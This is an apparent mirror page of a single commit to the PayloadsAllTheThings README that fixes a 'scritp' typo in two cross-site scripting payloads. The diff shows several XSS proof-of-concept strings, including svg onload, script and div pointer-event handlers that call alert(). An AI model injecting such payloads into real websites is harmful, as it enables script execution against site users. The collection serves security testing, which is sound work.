mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 09:25:26 +00:00
Update README.md
This commit is contained in:
parent
ee12f8e480
commit
1fd9260d1e
@ -180,8 +180,8 @@ Most tools are also suitable for blind XSS attacks:
|
||||
"><svg/onload=alert(String.fromCharCode(88,83,83))>
|
||||
"><svg/onload=alert(/XSS/)
|
||||
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
|
||||
<svg><scritp>alert('33')
|
||||
<svg><scritp>alert('33')
|
||||
<svg><script>alert('33')
|
||||
<svg><script>alert('33')
|
||||
|
||||
// Div payload
|
||||
<div onpointerover="alert(45)">MOVE HERE</div>
|
||||
|
Loading…
Reference in New Issue
Block a user